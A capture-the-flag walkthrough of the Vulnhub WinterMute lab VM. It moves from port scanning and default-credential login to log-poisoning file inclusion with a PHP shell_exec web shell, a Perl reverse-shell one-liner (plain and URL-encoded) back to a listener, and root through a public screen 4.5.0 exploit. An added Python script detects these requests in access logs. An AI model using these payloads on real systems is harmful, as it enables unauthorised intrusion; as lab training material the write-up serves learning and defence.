Write-Up On The Vulnhub Wintermute

The document summarizes getting initial access to a vulnerable VM called WinterMute. The author ran Nmap scans to find open ports, used Gobuster to find web directories, discovered a login page and used default credentials to authenticate. They were able to execute PHP code by directory traversal and get a reverse shell by encoding a Perl one-liner. Privilege escalation was then achieved by exploiting a vulnerability in screen.


Write-up on the Vulnhub WinterMute

We will start with an Nmap scan:

nmap -sV -sC 192.168.56.102

We can see an SMTP server on port 25, port 3000, which Nmap reports as hadoop-datanode, and an HTTP service on port 80.

Let's brute-force directories on the HTTP service with Gobuster.

Gobuster finds three directories: manual, freeside and server-status.

Opening manual gives us the Apache manual; freeside gives us nothing, not even in the page source.

The only thing left is port 3000, so we try browsing to it.


When we visit http://192.168.56.102:3000 we are redirected to
http://192.168.56.102:3000/lua/login.lua?referer=/ and get a login page.

The page above hints that the default username and password are both admin, so let's try them.

And we are lucky: we are able to log in.

On clicking the Flows option, we were redirected to the following page:


Here a few directories are listed (as shown in the screenshot above), so we try appending them to
http://192.168.1.124/ and http://192.168.1.124:3000/.

http://192.168.1.124:3000/turing-bolo/ gives nothing, however.

Then we browse http://192.168.1.124/turing-bolo/ and get the page below.

Click on Submit Query and we are redirected to the following page.

http://192.168.1.124/turing-bolo/bolo.php?bolo=case
From the above screenshot, we can see a few log files (as highlighted). In our experience this can indicate directory traversal (file inclusion), where files we can write to are included and executed through the browser. So let's try appending ../../../log/mail to the URL in the browser as follows:

http://192.168.1.124/turing-bolo/bolo.php?bolo=../../../log/mail
A Google search for "postfix log location" suggests the logs are at /var/log/mail.log. This plays well into our hands because of the .log extension. Let's explore this path of attack.

<?php echo shell_exec($_GET['cmd']);?>


Next, a Perl reverse shell back to my nc listener on port 1234. The Perl one-liner is URL-encoded to prevent any complications.

Before urlencoding

perl -e 'use Socket;$i="192.168.30.128";$p=1234;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/bash -i");};'

After urlencoding

perl%20-e%20%27use%20Socket%3B%24i%3D%22192.168.30.128%22%3B%24p%3D1234%3Bsocket%28S%2CPF_INET%2CSOCK_STREAM%2Cgetprotobyname%28%22tcp%22%29%29%3Bif%28connect%28S%2Csockaddr_in%28%24p%2Cinet_aton%28%24i%29%29%29%29%7Bopen%28STDIN%2C%22%3E%26S%22%29%3Bopen%28STDOUT%2C%22%3E%26S%22%29%3Bopen%28STDERR%2C%22%3E%26S%22%29%3Bexec%28%22%2Fbin%2Fbash%20-i%22%29%3B%7D%3B%27

Copy and paste the URL-encoded Perl reverse shell after cmd=. And ... a shell at last.

Now we have a shell.
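From the defender's side, the chain used above (a traversal in the bolo parameter, then a cmd parameter carrying the encoded one-liner) leaves clear traces in the web server's access log. The following Python script is an added example, not part of the original write-up: it parses a few constructed Apache-style log lines modelled on these requests, decodes each query parameter (twice, to also catch double encoding, which this write-up does not use) and flags traversal sequences, command-style payloads and PHP tags.

```python
import re
from urllib.parse import parse_qs, unquote, urlsplit

# Constructed Apache-style access-log lines modelled on the requests in this
# write-up (timestamps and response sizes are made up).
SAMPLE_LOG = """\
192.168.30.128 - - [10/Jan/2020:10:01:02 +0000] "GET /turing-bolo/bolo.php?bolo=case HTTP/1.1" 200 512
192.168.30.128 - - [10/Jan/2020:10:01:40 +0000] "GET /turing-bolo/bolo.php?bolo=../../../log/mail HTTP/1.1" 200 2048
192.168.30.128 - - [10/Jan/2020:10:02:15 +0000] "GET /turing-bolo/bolo.php?bolo=../../../log/mail&cmd=perl%20-e%20%27use%20Socket%3B HTTP/1.1" 200 10
192.168.30.128 - - [10/Jan/2020:10:03:00 +0000] "GET /manual/index.html HTTP/1.1" 200 4096
"""

# Common Log Format: client ident user [timestamp] "METHOD target protocol" status
REQUEST_RE = re.compile(r'^(?P<src>\S+) \S+ \S+ \[[^\]]+\] '
                        r'"[A-Z]+ (?P<target>\S+) [^"]*" \d{3}')
# Interpreter followed by an inline-code flag, as in the perl -e one-liner above
CMD_RE = re.compile(r"\b(perl|python|bash|sh|nc)\b.*-[ec]\b")


def classify_request(target: str) -> list:
    """Return findings for one request target (path plus query string)."""
    findings = []
    query = urlsplit(target).query
    for name, values in parse_qs(query, keep_blank_values=True).items():
        for raw in values:
            # parse_qs already decoded once; decode again to defeat double encoding
            value = unquote(unquote(raw))
            if "../" in value or "..\\" in value:
                findings.append(f"traversal in {name}")
            if name == "cmd" or CMD_RE.search(value):
                findings.append(f"command-style payload in {name}")
            if "<?php" in value.lower():
                findings.append(f"php tag in {name}")
    return findings


def scan_access_log(text: str) -> list:
    """Return (client, target, findings) for every suspicious request line."""
    alerts = []
    for line in text.splitlines():
        match = REQUEST_RE.match(line)
        if not match:
            continue  # not a request line in the expected format
        findings = classify_request(match.group("target"))
        if findings:
            alerts.append((match.group("src"), match.group("target"), findings))
    return alerts
```

Running scan_access_log over a real access log gives the client address and the offending request for each hit; the mail log itself is not covered here, since the PHP tag is injected through SMTP rather than HTTP.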

Now we will do privilege escalation.

Let's enumerate the system by running the following command, which lists SUID binaries:

find / -perm -4000 2>/dev/null

The SUID listing includes screen 4.5.0. Searching for a screen 4.5.0 exploit, we find one public exploit:

https://www.exploit-db.com/exploits/41154

After running the exploit we get root.


Now it is time to capture the flag.
